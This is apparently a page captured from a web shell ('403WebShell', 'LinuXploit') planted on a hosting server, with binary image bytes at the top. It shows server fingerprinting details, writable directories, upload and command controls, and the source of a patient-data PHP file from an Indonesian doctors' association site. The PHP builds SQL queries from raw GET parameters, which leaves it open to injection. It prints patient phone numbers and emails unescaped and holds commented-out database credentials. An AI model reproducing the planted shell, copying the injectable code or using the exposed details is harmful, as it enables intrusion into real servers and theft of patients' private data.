JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 91.108.119.174  /  Your IP : 216.73.216.52
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/project/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/project/d_pasien.php
<?php include "header.php"; ?>
<!DOCTYPE html>

<div class="container">
	<div class="panel panel-primary">
				<nav class="navbar navbar-inverse">
    <div class="container-fluid">
	<br>
     <div class="navbar-header">
      <a class="navbar-brand" href="index.php">Ikatan Dokter Indonesia</a>
    </div>
  </div>
</nav>
	  <div class="panel-body">
<html>
<head>
	<script type="text/javascript" src="chartjs/Chart.js"></script>
<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
	 	<script>
	  		$( function() {
	    		$( "#datepicker" ).datepicker({ dateFormat: 'yy-mm-dd' });
	    		$( "#datepicker2" ).datepicker({ dateFormat: 'yy-mm-dd' });
	  		} );
	  	</script>
		
	  <title>Upload dan Download File</title>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" />
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  
  <!--Script CSS-->
  <link type="text/css" href='https://cdn.datatables.net/1.10.16/css/jquery.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/responsive/2.2.1/css/responsive.dataTables.min.css' rel='stylesheet'>
  <link type="text/css" href='https://cdn.datatables.net/buttons/1.5.1/css/buttons.dataTables.min.css' rel='stylesheet'>	
		
		
</head>
<body>
	<style type="text/css">
	body{
		font-family: roboto;
		font-size: 12px;
	}
 
	table{
		margin: 0px auto;
	}
	</style>
 
<?php 

//$koneksi = mysqli_connect("localhost","bhaktiag_sales","cleosa2020","bhaktiag_sales");
//$koneksi = mysqli_connect("localhost","root","","agdsales");
?>
   
   <br /><br />
<div class="form-group">    

<center><h4>DATA Pasien  </h4></center> 


    <?php
 $npm = isset($_GET['npm']) ? $_GET['npm'] : '';
  $hariini = date('Y-m-d');
  $npm=$_GET['npm'];
  $idpsn=$_GET['idpsn'];
			 $no=0;
				
	$query_pasien=$konek->query("SELECT * FROM h_psn where npm='$npm' AND id_psn='$idpsn'  group by wilker");					   	

						   
						   
			 	while ($dp=$query_pasien->fetch_assoc()) {
			      
			      $id=$dp['id'];
				  $inpm = $dp['npm'];
				   $psn = $dp['pasien'];
				  $wilker = $dp['wilker'];
				  $hari = $dp['hari'];
				  $jam = $dp['jam1'];
			      
			      $query_absen=$konek->query("SELECT * FROM d_janji where wilker='$wilker' AND id_psn='$_GET[idpsn]'  order by noant");
		      
			      $cek = $query_absen->num_rows;
			      if ($cek!==0) {
				  ?>
			 
	  	          
				        <table id="example" class="display nowrap table-striped table-bordered table" style="width:100%">

							<h2> <?php echo $wilker ?></h2>
                            <h4><?php echo $hari ?></h4> 
                            <h4><?php echo $jam ?></h4> 
   <br>
       
			            <thead>
			               <tr>

			                <th>No</th>
                            <th>NO Antrian</th>
			                <th>Tanggal periksa</th>
							<th>Pasien</th>
                            <th>Status</th>
                            <th>telp</th>
                            <th>Email</th>
                            
			                <th>Action</th>
			               </tr>
			         </thead>
                   <tbody class="alert-success">
			          
			         
			<?php
			 $no=0;
			          while ($dd=$query_absen->fetch_assoc()) {
			            $no++;
						 $pasien = "$dd[pasien]";
			          
			            $telp = "$dd[telp]";
		             	$email = "$dd[email]";
						   ?>
						
			          <tr>
      
			                <td data-header='No'><?php echo $no ?></td>
                            <td data-header='Lokasi '><?php echo $dd['noant']; ?></td>
                              <td data-header='Lokasi '><?php echo $dd['tgl_reg']; ?></td>
                             
			                <td data-header='Lokasi '><?php echo $pasien ?></td>
                             <td data-header='Lokasi '><?php echo $dd['status']; ?></td>
			                <td data-header='Hari'><?php echo $telp?></td>
			                <td data-header='Waktu'><?php echo $email ?></td>
                            <td data-header='Waktu'> <a class='btn btn-success btn-sm' href='kjanji.php?npm=<?php echo $dd['npm']; ?>&nmlead=<?php echo $dd['pasien']; ?>&telp=<?php echo $dd['telp']; ?>&id=<?php echo $dd['id']; ?>'>Konfirmasi</a></td>
			               
			              </tr>
						  <?php   
			          }
					   ?>  
					 </tbody>  
			        </table>
					  <?php
			      	}
				}
				
	    ?>   
        <br>  <br>    <br>   
		</div> 




 </div>

	          <!--Script Javascript-->
                  <script src="https://code.jquery.com/jquery-1.12.4.js"></script>
                  <script src="https://cdn.datatables.net/1.10.16/js/jquery.dataTables.min.js"></script>
                  <script src="https://cdn.datatables.net/responsive/2.2.1/js/dataTables.responsive.min.js"></script>
                  <script src="https://cdn.datatables.net/buttons/1.5.1/js/dataTables.buttons.min.js"></script>
                  <script src="https://cdn.datatables.net/buttons/1.5.1/js/buttons.colVis.min.js"></script>
                  <script>
 $(document).ready(function() {
  $('#example').DataTable( {
    dom: 'Bfrtip',
    buttons: [
    'colvis'
    ]
  } );
} );
                </script>		
	  

	  
	
	          </div>
          </div>
      </div>
      </div>	
    </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit